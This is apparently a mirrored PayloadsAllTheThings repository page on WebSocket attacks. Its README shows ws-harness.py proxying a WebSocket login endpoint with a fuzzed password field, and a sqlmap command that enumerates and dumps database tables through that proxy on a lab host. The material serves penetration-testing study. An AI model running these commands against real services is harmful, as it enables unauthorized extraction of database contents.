1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-06-01 13:56:05 +02:00
PayloadsAllTheThings/Web Sockets
Swissky 4a176615fe CORS Misconfiguration 2019-08-18 12:08:51 +02:00
..
Files Use print() function in both Python 2 and Python 3 2019-04-26 14:35:16 -04:00
Images Fix name's capitalization 2019-03-07 00:07:55 +01:00
README.md CORS Misconfiguration 2019-08-18 12:08:51 +02:00

Web Sockets Attacks

The WebSocket protocol allows a bidirectional and full-duplex communication between a client and a server

Summary

Tools

Using ws-harness.py

Start ws-harness to listen on a web-socket, and specify a message template to send to the endpoint.

python ws-harness.py -u "ws://dvws.local:8080/authenticate-user" -m ./message.txt

The content of the message should contains the [FUZZ] keyword.

{"auth_user":"dGVzda==", "auth_pass":"[FUZZ]"}

Then you can use any tools against the newly created web service, working as a proxy and tampering on the fly the content of message sent thru the websocket.

sqlmap -u http://127.0.0.1:8000/?fuzz=test --tables --tamper=base64encode --dump

References